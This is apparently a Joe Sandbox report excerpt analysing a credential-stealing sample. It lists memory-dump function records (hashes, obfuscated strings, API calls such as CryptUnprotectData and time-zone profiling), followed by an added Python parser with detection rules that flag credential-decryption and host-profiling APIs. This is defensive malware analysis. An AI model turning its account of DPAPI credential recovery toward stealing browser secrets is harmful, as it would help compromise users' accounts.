                                  • Opcode Fuzzy Hash: 0b4b1464afc0634d8d2033b0489ac61830e1d8ec97bfd4902855924fcb8dee6e
                                  • Instruction Fuzzy Hash: 8063637341EBD51ECB27EB3047B61917F66FA1331031869CEC4C9AB4B3CA909A16E356
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ,zbH$..qz$V8_n$ck}-
                                  • API String ID: 0-2735418471
                                  • Opcode ID: d6f14fea0d0a361dc0106ee134c5372a36d638cb8d61b41256e841e893858198
                                  • Instruction ID: a07d9109fbd85a5c257e8c98739cb7cca175b1d5f77547d7d71421c243b3b9a7
                                  • Opcode Fuzzy Hash: d6f14fea0d0a361dc0106ee134c5372a36d638cb8d61b41256e841e893858198
                                  • Instruction Fuzzy Hash: 10B237F3A082149FE304AE2DEC8567AFBE9EF94720F1A453DEAC4C3744E63558058697
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: Rbo$>O?m$Fv~F$|_~
                                  • API String ID: 0-1694952782
                                  • Opcode ID: 878c3cebaef23b80d13cdde7d81d2ce41db7ee1021fce94ea36f9c6149e2afa2
                                  • Instruction ID: dc0bdbc90708b6a1cab3073afb6c56e5c4fcc2801bc1af6523eb4691705c05d0
                                  • Opcode Fuzzy Hash: 878c3cebaef23b80d13cdde7d81d2ce41db7ee1021fce94ea36f9c6149e2afa2
                                  • Instruction Fuzzy Hash: 1EB207F360C2049FE304AE29EC8567ABBE9EF94720F16493DEAC5C3744E63598418797
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: (tG$1@__$SZ7$vhOw
                                  • API String ID: 0-3305334
                                  • Opcode ID: 4a6228944cacb11029378412641005a94b6df7bc4708a49d9c86dd4fdf49063a
                                  • Instruction ID: a8505e5c94f7387a92daad74c8a273a78de125944d10d47a7ba44fd496043d9b
                                  • Opcode Fuzzy Hash: 4a6228944cacb11029378412641005a94b6df7bc4708a49d9c86dd4fdf49063a
                                  • Instruction Fuzzy Hash: D2B2E5F3A0C2109FE304AE2DEC8567ABBE9EF94720F16493DEAC4C7744E63558058697
                                  APIs
                                  • CryptBinaryToStringA.CRYPT32(00000000,00E651D4,40000001,00000000,00000000,?,00E651D4), ref: 00E79050
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptString
                                  • String ID:
                                  • API String ID: 80407269-0
                                  • Opcode ID: 31d039622477c9c0cdf88921a01685a576dfe81bccddbedf0f40aedd07e1d164
                                  • Instruction ID: eb91ca9ea59fe7988a8e5e5487b76c8c8e38dc9bcb43818303dc71ca01bf0a33
                                  • Opcode Fuzzy Hash: 31d039622477c9c0cdf88921a01685a576dfe81bccddbedf0f40aedd07e1d164
                                  • Instruction Fuzzy Hash: BB1106B4210209FFDF04CF54D894FAA33A9AF8A314F10D458FA299B245D775E941DBA0
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0173DD20,00000000,?,00E80DF8,00000000,?,00000000,00000000), ref: 00E77BF3
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E77BFA
                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0173DD20,00000000,?,00E80DF8,00000000,?,00000000,00000000,?), ref: 00E77C0D
                                  • wsprintfA.USER32 ref: 00E77C47
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                  • String ID:
                                  • API String ID: 3317088062-0
                                  • Opcode ID: 0932775ef2005828778eac3a31ef672eb7965b1b4d1908d7ed42261225b2a415
                                  • Instruction ID: 4e8a642b54f32f10da3fa831a5c726731c277be98dab58f5745ef8de0776bae1
                                  • Opcode Fuzzy Hash: 0932775ef2005828778eac3a31ef672eb7965b1b4d1908d7ed42261225b2a415
                                  • Instruction Fuzzy Hash: C411A1B1905218EBEB249B54DC45FA9B778FB48721F1047E5F619A32C4D7741A84CB50
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: :RO$s+,$xM-
                                  • API String ID: 0-103202690
                                  • Opcode ID: 89357c16f6a425e8203bcae7c62f9f9b1af9572941e885eca634465881477d3c
                                  • Instruction ID: 29f696008a499f8e587eb8f4affd4a5deb528419c72e5456e1b9411dab7332f4
                                  • Opcode Fuzzy Hash: 89357c16f6a425e8203bcae7c62f9f9b1af9572941e885eca634465881477d3c
                                  • Instruction Fuzzy Hash: C8B216F3A0C6149FE3086E2DEC8567AFBE9EF94720F16493DE6C4C3744EA3558018696
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 6m}M$6m}M$h#wi
                                  • API String ID: 0-2794162058
                                  • Opcode ID: 86db802626a7aae744697c33a1dad821913a4c5309e4160799851ce448eed6bd
                                  • Instruction ID: 35a6b73bff1995e8fb618534afc0178135bec1de53b3e848d232539a869b33eb
                                  • Opcode Fuzzy Hash: 86db802626a7aae744697c33a1dad821913a4c5309e4160799851ce448eed6bd
                                  • Instruction Fuzzy Hash: 0882D6F36082009FE714AE2DEC8577ABBE9EFD4720F19893DE6C4C3744E63598058696
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: *g&$^!s~$u6=
                                  • API String ID: 0-1718418126
                                  • Opcode ID: 0a4d7b0b7cef07cbfa63d1ec70faf86887132d4e3b9fbad5f172ed7b5e798770
                                  • Instruction ID: e89458b189123376a6944f8869a598874f5d44fc700dbcdb6a1d088514312980
                                  • Opcode Fuzzy Hash: 0a4d7b0b7cef07cbfa63d1ec70faf86887132d4e3b9fbad5f172ed7b5e798770
                                  • Instruction Fuzzy Hash: FF5209F3A0C2109FE314AE2DEC8566AFBE5EF94720F16893DEAC4C7344E63558058697
                                  APIs
                                  • CoCreateInstance.COMBASE(00E7E120,00000000,00000001,00E7E110,00000000), ref: 00E739A8
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00E73A00
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharCreateInstanceMultiWide
                                  • String ID:
                                  • API String ID: 123533781-0
                                  • Opcode ID: eb5c900e2ea70ef92847eb49d4bbf8f6c045dd84c00a4a90b1db4d67e57b8d36
                                  • Instruction ID: d99b742981b24fb8b71b739cf0e7d0fb7c29d90d7fe8df49deea3573470e88e2
                                  • Opcode Fuzzy Hash: eb5c900e2ea70ef92847eb49d4bbf8f6c045dd84c00a4a90b1db4d67e57b8d36
                                  • Instruction Fuzzy Hash: 6C410670A40A289FDB24DB58CC95F9BB7B5AB48302F4091D8E618E72D0D7B1AEC5CF50
                                  APIs
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00E6A2D4
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00E6A2F3
                                  • LocalFree.KERNEL32(?), ref: 00E6A323
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$AllocCryptDataFreeUnprotect
                                  • String ID:
                                  • API String ID: 2068576380-0
                                  • Opcode ID: c713aff33e2b453febfef417bfdd236895c02c46110a7ba5573525eea5ce2092
                                  • Instruction ID: 965db1481ed12d5b13958d7031d0e810c19aa8ad857fa827af2dc49460637147
                                  • Opcode Fuzzy Hash: c713aff33e2b453febfef417bfdd236895c02c46110a7ba5573525eea5ce2092
                                  • Instruction Fuzzy Hash: 8F11BAB5A00209DFCB04DFA4D985AAEB7B5FF89300F108569ED15A7394D730AE51CF61
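The function records above are what an analyst actually works from: the CryptUnprotectData/LocalAlloc/LocalFree record is the DPAPI call that unlocks browser credential stores, the GetTimeZoneInformation/wsprintfA record is host profiling for the exfiltrated system report, and the function carrying the string "xn--" (the IDN/Punycode label prefix) is doing host-name handling. The following parser is an added example, not code from the Joe Sandbox report or from Joe Security; it reads records in the exact line format printed above (the record text embedded in it is copied from this page) and tags functions whose API or string set matches a rule. The rule tables are the editor's own hypotheses, not findings of the report, and the record structure it assumes (a record opens at an "APIs" or "Strings" heading) is an assumption drawn from the listing itself.

```python
"""Parse Joe Sandbox function records (the "APIs" / "Similarity" listings) and
tag API clusters worth an analyst's attention.  Added example, not code from the
report or from Joe Sandbox.  REPORT_TEXT is copied from the records on this page;
API_RULES and STRING_RULES are my own hypotheses, not report findings."""
import re
from dataclasses import dataclass, field

# Three records reproduced from the report above, bullets as printed.
REPORT_TEXT = """\
APIs
• RtlAllocateHeap.NTDLL(00000000), ref: 00E77BFA
• GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0173DD20,00000000,?,00E80DF8,00000000,?,00000000,00000000,?), ref: 00E77C0D
• wsprintfA.USER32 ref: 00E77C47
Memory Dump Source
• Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
Similarity
• API ID: Heap$AllocateInformationProcessTimeZonewsprintf
APIs
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00E6A2D4
• LocalAlloc.KERNEL32(00000040,00000000), ref: 00E6A2F3
• LocalFree.KERNEL32(?), ref: 00E6A323
Memory Dump Source
• Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
Similarity
• API ID: Local$AllocCryptDataFreeUnprotect
Strings
Memory Dump Source
• Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
Similarity
• API ID:
• String ID: xn--
• Opcode ID: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
"""

# "• Name.MODULE(args), ref: ADDR"; the args and the comma are optional, as in
# the wsprintfA line above.
API_LINE = re.compile(r"^• (\w+)\.(\w+)(?:\(.*\))?,? ref: ([0-9A-Fa-f]+)$")
SOURCE_LINE = re.compile(r"^• Source File: (\S+), Offset:")
FIELD_LINE = re.compile(r"^• (API ID|String ID|Opcode ID):\s*(.*)$")


@dataclass
class FunctionRecord:
    kind: str                                   # heading that opened it: "APIs" or "Strings"
    apis: list = field(default_factory=list)    # (api, module, call-site ref) tuples
    region: int = 0                             # base of the dump region holding the function
    api_id: str = ""
    string_id: str = ""                         # referenced strings, joined with "$"
    opcode_id: str = ""


def parse_records(text):
    """One FunctionRecord per "APIs"/"Strings" heading; other lines are ignored."""
    records = []
    for raw in text.splitlines():
        line = raw.strip()
        if line in ("APIs", "Strings"):
            records.append(FunctionRecord(kind=line))
            continue
        if not records:
            continue
        rec = records[-1]
        if m := API_LINE.match(line):
            rec.apis.append((m.group(1), m.group(2), m.group(3).upper()))
        elif m := SOURCE_LINE.match(line):
            # 4th dotted field of the .sdmp name is the region base address
            rec.region = int(m.group(1).split(".")[3], 16)
        elif m := FIELD_LINE.match(line):
            setattr(rec, m.group(1).lower().replace(" ", "_"), m.group(2))
    return records


# Hypothesis rules (mine): every API in the set must occur in the same function.
API_RULES = {
    # DPAPI decryption is how browser credential stores are unlocked; in a
    # stealer this is the credential-recovery routine.
    "dpapi-unprotect": {"CryptUnprotectData"},
    # Time zone read and formatted with wsprintf: host profiling for the report.
    "host-profile-timezone": {"GetTimeZoneInformation", "wsprintfA"},
}
# "xn--" is the IDN/Punycode label prefix: the function handles host names.
STRING_RULES = {"idn-punycode-handling": "xn--"}


def flag_records(records):
    """Return (tag, anchor) pairs; the anchor is the record's first call-site ref,
    or the opcode ID prefix for string-only records, so the hit is easy to find."""
    hits = []
    for rec in records:
        names = {api for api, _mod, _ref in rec.apis}
        for tag, needed in API_RULES.items():
            if needed <= names:
                hits.append((tag, rec.apis[0][2]))
        strings = [s for s in rec.string_id.split("$") if s]
        for tag, needle in STRING_RULES.items():
            if any(needle in s for s in strings):
                hits.append((tag, rec.opcode_id[:16]))
    return hits


if __name__ == "__main__":
    for tag, anchor in flag_records(parse_records(REPORT_TEXT)):
        print(f"{tag:<24} {anchor}")
```

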